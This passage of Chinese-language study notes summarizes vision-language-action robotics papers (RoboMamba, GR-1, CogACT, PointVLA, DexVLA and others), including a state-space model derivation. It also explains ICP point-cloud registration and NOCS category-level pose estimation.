    $$ \begin{aligned} &\hat{X}_t^l=\text{Tanh}(\alpha)\cdot\text{MLP}(A(X_t^lW_Q^C,X_t^vW_K^C,X_t^vW_V^C))+X_t^l,\ &X_t^{l+1}=\text{MLP}(A(\hat{X}_t^lW_Q^S,\hat{X}_t^lW_K^S,\hat{X}_t^lW_V^S))+\hat{X}_t^l \end{aligned} $$

  4. max pooling 后送入策略头,以一个循环模型(LSTM)进行时序建模,直接预测 7 DoF 动作 $$ \tilde{X}_t=\mathrm{MaxPooling}(X_t)\ h_t=\mathrm{LSTM}(\tilde{X}t,h{t\boldsymbol{-}1})\ a_t^{pose},a_t^{gripper}=\mathrm{MLP}(h_t) $$

Train

监督信号:专家示范动作

  • 位姿预测:MSE 损失
  • 夹爪状态:BCE 损失
  • 总损失: $$ \mathcal{L} = \sum_t |a_t^{pose} - \hat{a}_t^{pose}|^2 + \lambda \cdot \text{BCE}(a_t^{grip}, \hat{a}_t^{grip}) $$

微调策略

  • 仅训练:重采样器参数 + 交叉注意力层 + 策略头
  • 冻结:ViT 参数 + 语言模型参数
  • 结果:参数量 <1% 的微调,高效且防过拟合

RoboMamba

Paper

Mamba

mamba

Mamba Youtube 讲解 / CSDN

传统模型的问题:

  1. Transformer 自注意力机制的计算复杂度为 $O(L^2)$($L$ 为序列长度),资源需求量大

  2. RNN 等在反向传播的时候需要沿着时间维度逐步进行(Backpropagation through time),无法并行训练;且长程依赖关系容易造成梯度消失 / 爆炸,尽管 LSTM 等通过门控机制缓解,但并未完美解决。

    RNN 的本质是一个这样的函数:

    $$ h_{t+1} = f(h_t, x_{t+1}) $$

SSM

  1. 本质类似 RNN,但是在训练的时候无需像 LSTM 一样总要等到隐状态沿着时间维度完整前传,而是类似 Transformer,可以并行地处理所有 Token
    1. 隐状态之间没有非线性,而是具有了很好的线性性质,可以直接化为一个完整的矩阵乘法
    2. 没有时间依赖性(线性非时变系统),$A$ 和 $B$ 在整个前向推理过程中不变,从状态 1 转到状态 2,和从状态 2 转到状态 3 是一样的,换句话说聚合信息的方式是恒定的
  2. 推理时像无隐状态的线性 RNN,可以并行地推导所有步骤的输出,而无需像 Transformer 一样以自回归地形式一个 Token 一个 Token 地输出(因为 Transformer 在推理过程中的注意力矩阵是动态构建的)

以下为 S4 的数学推导,摘录整理自 这里,补全了最后一步的跳步。

状态空间模型将系统的状态、输入和输出关系表示为:

$$ \begin{aligned} \dot{x}(t) &= A(t)x(t) + B(t)u(t)\ y(t) &= C(t)x(t) + D(t)u(t) \end{aligned} $$

其中,$A,B,C,D$ 是系数矩阵,$x(t)$ 是状态向量,$u(t)$ 是输入向量,$y(t)$ 是输出向量。

假定系数矩阵不随时间变化,这可以简化为线性非时变系统:

$$ \begin{aligned} \dot{x}(t) &= Ax(t) + Bu(t)\ y(t) &= Cx(t) + Du(t) \end{aligned} \tag{1} $$

容易发现,核心其实是第一个式子,但若直接对状态方程积分:

$$ x(t) = x(0) + \int_0^t (Ax(\tau) + Bu(\tau))\mathrm{d}\tau $$

积分项包含 $x(\tau)$ 本身,但我们无法获取连续时间内所有 $x(\tau)$ 值,导致积分无法完成。

所以,我们将上式转换为离散形式:

$$ x(k+1) = x(k) + \sum_{i=0}^k (Ax(i) + Bu(i))\Delta t $$

但这仍需要改造原方程,消除 $\dot{x}(t)$ 表达式中的 $x(t)$ 从而可以积分。

构造辅助函数 $\alpha(t)x(t)$ 并求导:

$$ \frac{\mathrm{d}}{\mathrm{d}t}[\alpha(t)x(t)] = \alpha(t)\dot{x}(t) + x(t)\frac{\mathrm{d}\alpha(t)}{\mathrm{d}t} $$

代入状态方程 $(1)$:

$$ \frac{\mathrm{d}}{\mathrm{d}t}[\alpha(t)x(t)] = \alpha(t)(Ax(t) + Bu(t)) + x(t)\frac{\mathrm{d}\alpha(t)}{\mathrm{d}t} $$

合并 $x(t)$ 的相关系数:

$$ \frac{\mathrm{d}}{\mathrm{d}t}[\alpha(t)x(t)] = \left(A\alpha(t) + \frac{\mathrm{d}\alpha(t)}{\mathrm{d}t}\right)x(t) + B\alpha(t)u(t) \tag{2} $$

为消除导数中的 $x(t)$,令其系数为 $0$:

$$ A\alpha(t) + \frac{\mathrm{d}\alpha(t)}{\mathrm{d}t} = 0 $$

解得:

$$ \alpha(t) = e^{-At} $$

代入 $(2)$:

$$ \frac{\mathrm{d}}{\mathrm{d}t}[e^{-At}x(t)] = Be^{-At}u(t) $$

对此式积分:

$$ e^{-At}x(t) = x(0) + \int_0^t e^{-A\tau}Bu(\tau)\mathrm{d}\tau $$

整理得到:

$$ x(t) = e^{At}x(0) + \int_0^t e^{A(t-\tau)}Bu(\tau)\mathrm{d}\tau $$

在离散系统中:

  • 定义采样时刻 $t_k$ 和 $t_{k+1}$,采样间隔 $T = t_{k+1} - t_k$
  • 将连续时间积分区间分成离散子区间:

$$ x(t_{k+1}) = e^{A(t_{k+1}-t_k)}x(t_k) + \int_{t_k}^{t_{k+1}} e^{A(t_{k+1}-\tau)}Bu(\tau)\mathrm{d}\tau \tag{3} $$

采用零阶保持法,假设 $u(t)$ 在采样间隔内保持恒定:

$$ \int_{t_k}^{t_{k+1}} e^{A(t_{k+1}-\tau)}Bu(\tau)\mathrm{d}\tau = \int_{t_k}^{t_{k+1}} e^{A(t_{k+1}-\tau)}\mathrm{d}\tau \cdot Bu(t_k) $$

代入 $(3)$,并使用 $T = t_{k+1} - t_k$:

$$ x(t_{k+1}) = e^{AT}x(t_k) + \int_{t_k}^{t_{k+1}} e^{A(t_{k+1}-\tau)}\mathrm{d}\tau \cdot Bu(t_k) $$

引入变量替换 $\lambda = t_{k+1} - \tau$:

$$ x(t_{k+1}) = e^{AT}x(t_k) + Bu(t_k)\int_0^T e^{A\tau}\mathrm{d}\tau $$

原文这里略有跳步,只需要展开矩阵指数然后假设 $A$ 可逆从而合并系数再重新合并成矩阵指数即可:

$$ e^{A\tau} = I + A\tau + \frac{(A\tau)^2}{2!} + \frac{(A\tau)^3}{3!} + \dots $$

$$ \begin{aligned} \int_0^T e^{A\tau} \mathrm{d}\tau &= \int_0^T \left( I + A\tau + \frac{(A\tau)^2}{2!} + \frac{(A\tau)^3}{3!} + \dots \right) \mathrm{d}\tau \ &= \int_0^T I \mathrm{d}\tau + \int_0^T A\tau \mathrm{d}\tau + \int_0^T \frac{(A\tau)^2}{2!} \mathrm{d}\tau + \dots \ &= T \cdot I + \frac{A T^2}{2} + \frac{A^2 T^3}{3 \cdot 2!} + \frac{A^3 T^4}{4 \cdot 3!} + \dots \ &= \sum_{k=0}^{\infty} \frac{A^k T^{k+1}}{(k+1)!} \ &= \sum_{m=1}^{\infty} \frac{A^{m-1} T^m}{m!} \quad \text{换元:} m = k+1 \ &= A^{-1} \sum_{m=1}^{\infty} \frac{(A T)^m}{m!} \ &= A^{-1} (e^{A T} - I) \end{aligned} $$

最终离散时间状态方程:

$$ x(t_{k+1}) = e^{AT}x(t_k) + (e^{AT} - I)A^{-1}Bu(t_k) $$

容易想到这里还是会存在类似 RNN 的长程依赖问题,Mamba 最终其实相对于 S4 做了很多改进,包括 HiPPO(处理远程依赖性)等,这里就没详细去看了(逃)

Insight

robomamba

Training

robomamba_training

对齐预训练

数据:LLaVA 图像 - 文本对

目的:使用单一 MLP 对齐视觉特征编码与 Mamba 词嵌入

冻结 CLIP、Mamba,仅微调 Project MLP 投影层。

令对齐预训练数据集为 $\mathcal{D}a = {(I_k, T_k)}{k=1}^N$,其中:

  • $I_k \in \mathbb{R}^{W \times H \times 3}$:图像输入
  • $T_k = [t_1^{(k)}, t_2^{(k)}, ..., t_L^{(k)}]$:对应的文本描述(token 序列)

那么:

$$ p(y|I) = \text{Softmax}(\text{Mamba}([\text{Proj}(\text{Emb}(I)); \text{}])) \ \mathcal{L}a = -\sum{k=1}^N \sum_{t=1}^{L_k} \log p(t_t^{(k)} | t_{<t}^{(k)}, I_k) $$

指令协同训练

目的:学习长程规划、物理常识等技能

数据:$\mathcal{D}c = \mathcal{D}{gen} \cup \mathcal{D}_{robot}$ 为混合指令数据集

  • $\mathcal{D}_{gen}$:通用视觉指令数据(如 ShareGPT4V)
  • $\mathcal{D}_{robot}$:高级机器人指令数据(如 RoboVQA)

冻结 CLIP,微调 Project MLP 投影层、Mamba。

先在通用的上面训练,然后再在高级数据集上训练,损失函数为交叉熵。

这里不知道有没有采用渐进式混合 $\mathcal{L}c = \lambda \mathcal{L}{gen} + (1-\lambda)\mathcal{L}_{robot}$

这个阶段挺重要的,原文说跳过此处训练直接进行动作微调时,成功率从 82.3% 骤降至 47.1%。

动作微调

目的:训练动作策略头,获得操作能力

冻结 CLIP、Project MLP 投影层、Mamba,仅调整策略头。

$$ \begin{align} \mathcal{L}{pos} &= \frac 1N {\sum{i=1}^N |a_\mathrm{pos} - a^{gt}\mathrm{pos}|} \ \mathcal{L}{dir} &= \frac 1N {\sum_{i=1}^N \arccos\left (\frac{{\text{Trace}\Big(a^{gt}\mathrm{dir}}^\top a\mathrm{dir}\Big)-1}{2}\right )} \end{align} $$

注:两个旋转矩阵的乘积 $R^\top R_{gt}$ 表示相对旋转;对于旋转矩阵 $R$,其迹与旋转角度 $\theta$ 满足:

$$ \text{Trace}(R) = 1 + 2\cos\theta $$

从而通过迹可直接计算两个旋转矩阵之间的角度差异。

GR-1

Paper / Project Page

Generative Robot-1

gr1

Insight

  1. 数据瓶颈突破:传统视觉机器人操作受限于小规模机器人数据(高采集成本),而视频数据与机器人轨迹具有内在一致性(时间序列 + 多模态)
  2. 统一建模优势:GPT-style Transformer 可同时处理语言、图像、机器人状态,避免传统方法中多模块拼接的复杂性
  3. 预训练 - 微调协同:视频预测任务(预测未来帧)隐式学习物理规律,迁移到机器人动作推理时提升泛化能力

核心贡献:首次证明大规模视频生成预训练可迁移到机器人操作,统一 GPT 架构实现多模态 - 多任务端到端学习。

Method

Arch

Backbone:

  1. Vision Encoder:MAE 预训练的 ViT(图像 → patch tokens + CLS token)
  2. Language Encoder:冻结的 CLIP 文本编码器
  3. State Encoder:MLP 编码机器人末端位姿(6D)和夹爪状态(二进制)

Token 序列构造:

首先,所有模态的嵌入(图像、语言、状态)都通过线性变换映射到同一维度 $d$,然后将所有模态的 Token 拼接成一个序列。

视频生成预训练时:

$$ \text{Input Tokens} = \underbrace{[l]}{\text{语言}} \underbrace{[o{t-h}]}{\text{图像}} \underbrace{[\text{OBS}]}{\text{视频预测 cls}} \oplus \cdots \oplus [l][o_t][\text{OBS}] $$

使用机器人数据微调时:

$$ \text{Input Tokens} = \underbrace{[l]}{\text{语言}} \underbrace{[s{t-h}]}{\text{状态}} \underbrace{[o{t-h}]}{\text{图像}} \underbrace{[\text{OBS}]}{\text{视频预测 cls }} \underbrace{[\text{ACT}]}_{\text{动作预测 cls}} \oplus \cdots \oplus [l][s_t][o_t][\text{OBS}][\text{ACT}] $$

  1. 模态对齐:语言 Token $l$ 在每个时间步重复,防止被其他模态掩盖
  2. 因果注意力掩码:只能往前看,不能往后看
    • 预训练时掩码未来 $\text{[OBS]}$ Token
    • 微调时同时掩码 $\text{[OBS]}$ 和 $\text{[ACT]}$ Token
  3. 时间嵌入:每个时间步添加可学习的时间戳编码

训练流程

gr1_encoder_decoder

预训练阶段(视频生成)

输入:语言描述 + 历史帧序列

输出:未来帧预测(MSE 损失,和 MAE 重构损失一样,直接就是判断像素差)

$$ \mathcal{L}{\text{video}} = \frac{1}{H \times W} \sum{i=1}^H \sum_{j=1}^W \left( \hat{o}{t+\Delta t}(i,j) - o{t+\Delta t}(i,j) \right)^2 $$

  • $\hat{o}_{t+\Delta t}$:预测的未来帧
  • $o_{t+\Delta t}$:真实的未来帧
微调阶段(机器人操作)

输入:语言指令 + 历史状态 / 图像序列

输出:动作(连续位移 + 夹爪开合) + 未来帧预测

动作损失(Smooth L1):

$$ \mathcal{L}{\text{arm}} = \frac{1}{N} \sum{i=1}^N \begin{cases} 0.5 (a_{\text{arm}}^i - \hat{a}{\text{arm}}^i)^2, & \text{if } |a{\text{arm}}^i - \hat{a}{\text{arm}}^i| < 1 \ |a{\text{arm}}^i - \hat{a}_{\text{arm}}^i| - 0.5, & \text{otherwise} \end{cases} $$

  • $N$:批量大小(Batch Size)
  • $a_{\text{arm}}$:真实动作,$\hat{a}_{\text{arm}}$:预测动作,就是位移和旋转那六个自由度的数值

Smooth L1 Loss 是回归任务中常用的损失函数,结合了 L1 Loss 和 L2 Loss 的优点。其公式为:

$$ \text{SmoothL1}(x) = \begin{cases} 0.5x^2 & \text{当 } |x| < 1 \ |x| - 0.5 & \text{其他情况} \end{cases} $$

其中 $x = y_{\text{pred}} - y_{\text{true}}$ 表示预测值与真实值的差。

特点

  1. 在 $|x| < 1$ 时使用二次函数(类似 L2 Loss),梯度平缓,避免离群值梯度爆炸;
  2. 在 $|x| \geq 1$ 时使用线性函数(类似 L1 Loss),降低大误差时的梯度幅值;
  3. 在 $x=0$ 处可导,优化更稳定。

夹爪动作损失(Binary Cross-Entropy):

$$ \mathcal{L}{\text{gripper}} = -\frac{1}{N} \sum{i=1}^N \left[ y_i \log p_i + (1 - y_i) \log (1 - p_i) \right] $$

  • $y_i$:真实标签(0 或 1)
  • $p_i$:预测为张开状态的概率

总损失:

$$ \mathcal{L}{\text{finetune}} = \mathcal{L}{\text{arm}} + \mathcal{L}{\text{gripper}} + \mathcal{L}{\text{video}} $$

TinyVLA

Paper / Project Homepage

Insight

  1. 传统 VLA 模型依赖大型 VLM + AR,速度慢、推理延迟高
  2. 数据依赖问题

Method

  1. 使用小型 VLM Backbone
  2. 冻结预训练权重,仅微调部分参数(LoRA),保留多模态理解能力,减少数据依赖
  3. 使用扩散策略头来生成最终动作,以多模态主干输出的嵌入(图像 + 语言指令)作为扩散过程的控制条件

DiffusionVLA

Paper

没看懂他的 FiLM 注入模块是如何实现的。

推理标记通过 FiLM 层注入策略模型,FiLM 层对策略内部投影层的参数进行缩放和偏移。

film_vs_transformer

Reference

CogACT

Paper

Condition and Action

cogact

Insight

  1. VLM 直接将动作离散化为 Token 预测,忽略了动作的连续性和多模态性,导致成功率差、精度低
  2. 动作信号具有连续性、多模态性(同一任务有多个可行轨迹)、时序相关性,与语义 Token 有本质不同
  3. 模仿人脑功能划分,用 VLM 处理认知(理解任务),DiT 处理动作生成

Method

Arch

Backbone:

  1. Vision Encoder:DINOv2 + SigLIP
  2. LLM:LLaMA-2 7B
  3. Action:DiT

整体 Token 序列结构:

$$ \text{Input Tokens} = \underbrace{[V_1,...,V_{N_v}]}{\text{视觉}} \oplus \underbrace{[L_1,...,L{N_l}]}{\text{语言}} \oplus \underbrace{[C]}{\text{认知}} $$

使用因果注意力机制聚合信息后,得到认知特征 $f_t^c \in \mathbb{R}^{d_c}$。

$f_t^c, (a_t^i, a_{t+1}^i, ..., a_{t+N}^i)$ 作为动作模块的条件,进行条件扩散生成。

也即,训练网络学会从带噪声(人为加噪)的动作序列 $(a_t^i, a_{t+1}^i, ..., a_{t+N}^i)$ 中恢复出干净的动作序列 $(a_t, a_{t+1}, ..., a_{t+N})$。

其中:

  • 符号 $i$ 表示去噪步骤的索引,会通过位置编码加入到认知特征 $f_t^c$ 中
  • $t$ 表示时间步

Loss function

$$ \mathcal{L}_{\text{MSE}} = \mathbb{E}||\boldsymbol{\hat{\epsilon}}^i - \boldsymbol{\epsilon}||_2 $$

其中:

  • $\boldsymbol{\epsilon}$:扩散过程添加的高斯噪声
  • $\boldsymbol{\hat{\epsilon}}^i$:第 i 步去噪时预测的噪声

扩散模型通过预测噪声间接建模动作分布,避免直接回归的模态坍缩问题。

AAE (Adaptive Action Ensemble)

可以看到,我们每步根据观测信息最终会预测一个 Action Chunk,但推理的时候它们会彼此重叠,没有充分利用信息;而如果每个时间步都只用 Action Chunk 的最开始一部分,又会导致动作不平滑。

为此,作者提出了一种自适应动作聚合的方式,通过余弦相似度来为不同时间步预测的同一时刻的动作进行加权:

$$ \hat{\boldsymbol{a}}t = \sum{k=0}^{K} w^{\text{ada}}k \cdot \boldsymbol{a}{t}|\boldsymbol{o}_{t-k} $$

其中:

  • $\hat{\boldsymbol{a}}_t$:最终预测的动作
  • $w^{\text{ada}}_k$:加权系数
  • $\boldsymbol{a}{t}|\boldsymbol{o}{t-k}$:第 $t-k$ 步预测的第 $t$ 步动作
  • $\boldsymbol{o}_{t-k}$:第 $t-k$ 步的观测信息
  • $K$:采用最近几次的历史动作预测,基于训练集动作的标准偏差来确定

cogact_aae

加权系数的计算方式:

$$ w_k^{\text{ada}} = \exp(\alpha \cdot \langle \boldsymbol{a}_t|\boldsymbol{o}_t, \boldsymbol{a}t|\boldsymbol{o}{t-k} \rangle) $$

  • $\langle \cdot,\cdot \rangle$:余弦相似度(取值范围 $[-1,1]$)
  • $\alpha$:温度系数,超参数
  • $\boldsymbol{a}t|\boldsymbol{o}{t-k}$:基于历史观测 $\boldsymbol{o}_{t-k}$ 预测的当前时刻动作

实际使用时会进行 softmax 归一化:

$$ \hat{w}k = \frac{w_k^{\text{ada}}}{\sum{j=0}^K w_j^{\text{ada}}} $$

本质就是 相似度越高 → 权重越大,从而保留相同动作模式,并且实现平滑过渡。

PointVLA

Paper

pointvla

Insight

  • 现有 VLA 模型(如 OpenVLA、DexVLA)依赖 2D 图像输入,难以处理需要深度感知的任务;重新训练包含 3D 数据的 VLA 模型成本高昂,而丢弃已有的大规模 2D 数据集会造成资源浪费
  • 所以,选择将 3D 点云信息嵌入后注入动作专家模块,然而直接微调 VLM 主干会引发灾难性遗忘,不加选择的注入动作专家模块也会引发性能暴跌
  • 通过这种方式,作者实现了不破坏预训练 VLA,同时高效融合 3D 点云信息

Method

Arch

Backbone:

  • VLM:Qwen2-VL,2B
  • Action:ScaleDP,1B,Diffusion 变体

3D injector:在选定层执行 $h_{\text{new}} = h_{\text{2D}} + \text{MLP}(f_{\text{3D}})$,其中 $h_{\text{2D}}$ 为原动作专家选定的几个层的隐藏状态。

这里 $f_{\text{3D}}$ 有一个分层卷积设计,而且是从头开始训练的。作者发现,预训练的 3D 视觉编码器会阻碍性能,往往在新环境中难以成功学习机器人行为。

Skip-Block

由于要额外引入 3D 注入,所以作者探究了一下在动作专家模块中模块对性能的影响,从而选择影响较小的层去注入信息(这个思想类似于模型剪枝的时候的操作)。

作者发现,动作专家模块的前 11 层影响很大,后续层则可以进行替换或注入,这比较符合直接,前期对 2D 及语义特征的处理还相对低级,自然会比较重要,对性能影响大。

DexVLA

Paper

dexvla

Insight

  • 之前的 VLA 明显在 LLM 和 Action 部分大小失衡,过度扩展视觉语言模块(VLM 参数达 3B-7B),而动作专家部分(action expert)仍停留在百万参数级别,成为性能瓶颈

Method

Arch

Backbone:

  • VLM:Qwen2-VL,2B
  • Action:ScaleDP,1B,Diffusion 变体,具有多个策略头,可以适配多种不同的下游机型

Training

很怪的训练方法,分阶段训练不是没见过,但都是整体 pipeline 不变,只改变冻结部分的,本文的训练在不同阶段的 pipeline 都变了,前一阶段用的部分再后续阶段直接丢掉了。

  1. 阶段 1:仅用跨形态数据预训练动作专家,也就是扩散部分,学习低级运动技能(如抓取、移动)。语义部分 不是靠 VLM,而是暂时性靠另外一个 ViT/DistilBERT 编码,随后经过 FiLM+ResNet 来进行整合,送入扩散部分。
  2. 阶段 2:绑定 VLM 与动作专家,冻结 VLM 的视觉编码器,联合训练视觉到 Token 的投影层以及扩散专家,用特定形态数据对齐视觉 - 语言 - 动作映射。舍弃上一阶段的 FiLM+ResNet 不分。
  3. 阶段 3:全模型微调,微调时引入 高质量子步骤推理标注数据,使模型能自动分解长期任务(如 “叠衣服” 分解为展平、对齐袖子等)。

💾

视觉与抓取 II

2025年3月26日 07:26

迭代最近点算法(ICP)

动机

在机器人抓取任务中,物体的位姿估计精度直接影响抓取成功率。

以 YCB 数据集为例,当预测位姿的平移误差超过 2cm 时,抓取成功率会显著降低至 60% 以下。对于细长物体(如粉笔、剪刀),即使 2.5mm 的误差也可能导致抓取失败。

这种敏感性源于:

  1. 机械臂运动误差:沿特定方向的平移误差可能推翻物体
  2. 夹爪闭合策略:夹爪开合宽度需要与物体尺寸精确匹配
  3. 旋转容错性:旋转误差(如绕 Z 轴 30°)通常比平移误差更宽容

而对于 PoseCNN,仅 32% 的预测能达到 2cm 内的平移精度。这种误差水平难以满足实际抓取需求,因此需要后续优化。

posecnn_with_without_icp

算法原理与流程

ICP 用于优化初始位姿估计,通过迭代优化使源点云和目标点云对齐。

  • 源点云(Source/Moved Data): $P = {p_1, p_2, \dots, p_n}$,其中每个 $p_i \in \mathbb{R}^3$。点云可以表示为矩阵 $P \in \mathbb{R}^{3 \times n}$。
  • 目标点云(Target/True Data): $Q = {q_1, q_2, \dots, q_m}$,其中每个 $q_j \in \mathbb{R}^3$。点云可以表示为矩阵 $Q \in \mathbb{R}^{3 \times m}$。

注意:$n$ 和 $m$ 分别是源点云和目标点云中点的数量,它们可以不相等($n \neq m$)。

ICP 通过迭代优化寻找最佳的旋转矩阵 $\hat{R} \in \mathbb{SO}(3)$ 和平移向量 $\hat{T} \in \mathbb{R}^{3 \times 1}$,使得变换后的源点云 $P$ 与目标点云 $Q$ 尽可能对齐。

算法迭代步骤如下:

  1. 数据中心化(Make data centered)

    • 计算点云 $P, Q$ 的质心(均值):$\bar{P} = \frac{1}{n} \sum_{i=1}^n p_i, \bar{Q} = \frac{1}{m} \sum_{j=1}^m q_j$。
    • 将点云中心化:$\tilde{p}_i = p_i - \bar{P}, \tilde{q}_j = q_j - \bar{Q}$。得到中心化后的源点云矩阵 $\tilde{P} = [\tilde{p}_1, \dots, \tilde{p}_n] \in \mathbb{R}^{3 \times n}$ 和目标点云矩阵 $\tilde{Q} = [\tilde{q}_1, \dots, \tilde{q}_m] \in \mathbb{R}^{3 \times m}$。
    • 这一步的目的是先去除位移 $t$ 的影响
  2. 对应点匹配(Correspondence Search)

    • 对于当前源点云 $P$ 中的每一个点 $p_i$,在目标点云 $Q$ 中找到其最近邻点 $q_{j_i}$:

      $$ q_{j_i} = \operatorname{argmin}_{q_j \in \tilde{Q}} | \tilde{q}_j - \tilde{p}_i |^2_2 $$

    • 形成一个与 $P$ 点一一对应的目标点子集(correspondences)$P_{corr_pts} = { q_{j_1}, q_{j_2}, \dots, q_{j_n} }$

    • 得到对应目标点云矩阵 $\tilde{P}{corr} = [\tilde{q}{j_1}, \dots, \tilde{q}_{j_n}] \in \mathbb{R}^{3 \times n}$。

  3. 位姿求解(Pose Estimation using Orthogonal Procrustes)

    • 目标是找到最优旋转 $\hat{R}$,最小化中心化点云之间的距离:

      $$ \hat{R} = \operatorname{argmin}{R \in \mathbb{SO}(3)} |\tilde{P}{corr} - R\tilde{P}|_F^2 $$

    • 计算协方差矩阵 $K = \tilde{P}{corr} \tilde{P}^\top = \sum{i=1}^n \tilde{q}_{j_i} \tilde{p}_i^\top$,这是一个 $3 \times 3$ 矩阵。

    • 对 $K$ 进行 SVD 分解:$K = U D V^\top$。

    • 计算最优旋转矩阵 $\hat{R}$ (确保是旋转矩阵,处理可能的反射情况):

      $$ \hat{R} = U \begin{bmatrix} 1 & 0 & 0 \ 0 & 1 & 0 \ 0 & 0 & \det(UV^\top) \end{bmatrix} V^\top $$

    • 计算最优平移向量 $\hat{T}$: $$ \hat{T} = \bar{P}_{corr} - \hat{R} \bar{P} $$

    • 这里的详细推导可以参见前一章笔记的正交 Procrustes 问题

  4. 更新与迭代(Update P and Iterate)

    • 使用求得的 $\hat{R}, \hat{T}$ 更新 原始 源点云 $P$ 的位姿:

      $$ P_{new} = \hat{R} P + \hat{T} $$

      (这里 $P$ 是 $3 \times n$ 矩阵,$\hat{T}$ 是 $3 \times 1$ 向量,需要广播加到 $P$ 的每一列)

    • 将 $P_{new}$ 作为下一次迭代的输入源点云。

    • 重复步骤 2-4,直到满足收敛条件($\hat{R}, \hat{T}$ 变化足够小,或者达到最大迭代次数)。

ICP 收敛性

由于计算对应点匹配的时候 可能会导致非一一映射问题(好几个点离同一个点最近),此时必然无法找到一个完美的变换(不可能两个不同的点经过仿射变换到了同一个点)。

所以,ICP 并没有收敛保证,可能卡在局部最优(local minimum),但其对于 PoseCNN 的性能表现还是有很强的提升。

ICP 算法的问题

优点

  • 操作简便,无需进行点云分割或特征提取。
  • 当初始估计较为准确时,具有不错的精度和收敛性。

缺点

  • 寻找最近对应点计算成本高(可通过下采样密集点云或采用小样本匹配以加快迭代速度来降低)。
  • ICP 每次迭代太耗时,还会迭代很多次,所以后来提出了一些算法来加速。
  • 仅考虑点对点距离,未充分利用点云结构信息。
  • 对初始估计的准确性高度依赖。

类别级位姿估计(Category-Level Pose Estimation)

实例级别(Instance-Level)的位姿估计都要求我们知道物体的完整建模,否则我们缺乏目标,无法进行估计。

不过,对于一些有自然定义的 pose,它会具有一个天然的参考性(从而提供一个类别级的参考系),从而可以从 Instance level 延拓到 Category level,直接对这一类别的物体的 pose 进行预测。

这是王鹤老师在 CVPR 2019 Oral 的工作,原始论文可以参见 这里

这是如何做到的?当物体缺乏实例级别的 CAD 模型时,那就建立类别级的统一参考系。

这里的核心思想是 通过归一化操作定义标准化物体空间 Normalized Object Coordinate Space(NOCS)

  1. 旋转对齐 (Rotation Alignment):通过先验,使用物体的方向,对齐坐标系
  2. 平移归一化 (Translation Normalization):计算 Bounding box,将包围盒中心平移至坐标系原点
  3. 尺寸归一化 (Scale Normalization):通过对角线长度限制 Bounding box 的大小(限制对角线长度为 $1$,那么一定能装到 $1\times 1\times 1$ 的 Bounding box 内)

举个栗子 🌰

对于茶杯我们总是知道其大致形状的(先验)。

  1. 然后对齐物品的朝向,如把茶杯手柄的方向统一规定为某一轴的正方向,从而对齐 $R$
  2. 使用一个正方体的 bounding box 来框起来物体,然后强制把其中心定位在 $(0,0,0)$,从而对齐 $t$
  3. 归一化 Bounding box 的大小,从而对齐同一类物体的 size

nocs_1

nocs_2

nocs_3

好,现在有了参考系,那怎么用呢?

首先,我们指出一下该算法和 ICP 算法的本质区别:

  1. ICP 算法需要很强的先验知识,我们需要完整的知道物体的本身建模,然后以 RGBD 或者 RGB 重建得到的点云去与物体本身建模点云配准,由于求位姿的算法需要一个变换前后的坐标对,所以我们需要先进行最近邻匹配(也就是这一步导致了收敛性的缺失以及迭代速度的变慢),然后据此迭代得到物体位姿 $(R,t)$
  2. NOCS 算法不再需要完整的知道知道物体的本身建模,而是通过标准化的 NOCS 空间隐式地引入了对于某一类物体的、相较于 ICP 算法更粗粒度的几何先验,降低了对于高精建模的依赖,我们(使用合成数据)训练得到一个神经网络,可以从 RGB 图像直接为每一个像素预测其在 NOCS 中的对应点 $(x,y,z)$,随后将其与 RGBD 重建得到的点云信息进行配准,这里根据像素关系,可以天然形成数量相同的变换前后的坐标对,所以不再需要找到最近邻(Correspondence)。而后,我们可以直接用 Umeyama 算法(和 ICP 去除最近邻匹配的后半段类似)来重建得到 7 DoF 物体位姿 $(s,R,t)$

整个 NOCS 过程可以被建模为如下数学形式:

给定两组对应点云:

  • 规范空间点 $\mathbf{p}_i \in \mathbb{R}^3$(来自 NOC Map 预测)
  • 真实空间点 $\mathbf{q}_i \in \mathbb{R}^3$(来自深度图反投影)

寻找相似变换参数 $(s, R, t)$ 使得:

$$ sR\mathbf{p}_i + t = \mathbf{q}_i \quad \forall i $$

接着,我们给出算法的过程。

nocs_arch

nocs_arch_2

  1. 输入 RGBD 图像,提取 RGB 信息,使用 Mask R-CNN(如果没学过,可以参见我在 AI 基础写的 这篇笔记)获得 ROI(感兴趣区域,Region of Interest),分割物体
  2. 对于分割出的物体,对其每个像素预测其对应的 NOCS 空间坐标 $(x,y,z)$,得到 NOCS Map
  3. 利用 Depth 图像和相机内参,将 NOCS Map 中的点反投影(Back Projection)到三维空间中,得到点云数据
  4. 通过 NOCS Map 和 Depth 图像得到的点云数据,进行 Pose Fitting,利用 Umeyama 算法,计算得出物体的 7DoF 位姿(缩放 + 旋转 + 平移),缩放系数的计算就是简单的用 NOCS Map 的各轴向长度与物体实际点云各轴向作了一个除法。而反过来计算 Bounding Box 的时候,则利用了 NOCS 建模时令物体中心处在原点从而具有的对称性,以预测出的 NOCS Map 各轴向最大绝对值乘 2 再乘缩放系数作为了 Bounding Box 的各轴向尺寸

Umeyama 算法和前文类似,再次不再赘述。

了解了过程之后,一个很自然的问题就是:为什么不能直接用神经网络去根据 RGB 图像和 RGBD 反投影得到的深度图预测 6DoF 位姿?

  1. 首先,实验能证明这种方法比直接回归要好;
  2. 其次,直观的理解上可以想到,回归是一个从 3D $\to$ 6D 的直接预测,而 NOCS 是首先建立了 2D $\to$ 3D 的对应关系,然后将 6D 的位姿变换成了从 NOCS 3D 到 Depth 3D 的一个几何优化问题,明显后者比前者更符合直觉。
  3. 除此之外,NOCS 方法还充分利用了形状 / 几何先验,通过规范空间强制同类物体共享几何分布特征,使网络能学习类别级别的形状规律,学习起来会具有协同效应(Synergy),提升了对未见物体的泛化能力。

合成数据

刚才介绍过了 NOCS 方法,那么现在最大的问题就在于如何去训练这样一个从二维 RGB 图像重建到 NOCS 空间的神经网络了。

在类别级物体姿态估计任务中,真实数据标注面临两大挑战:

  1. 标注成本过高
  2. 类别泛化性不足

因此,直接去使用真实数据是很难成功的,所以很自然地,我们想要使用合成数据来进行训练。

但是,模型在合成数据($\mathcal{D}{syn}$)和真实数据($\mathcal{D}{real}$)上的往往存在差异,也即 Sim2Real Gap,这是由于这二者的分布是不同的,直接用真实数据去测试在合成数据上 Work 的方法,往往会导致性能暴跌。

为此,王老师提出了一种新的数据合成办法,也就是 Mixed Reality Data

mixed_reality_data

这种数据中,背景是真实的,而需要分割的前景是合成的(从而我们可以直接获得训练 NOCS 模型所需的监督信号),从而可以很轻易地获取到几十万量级的数据。

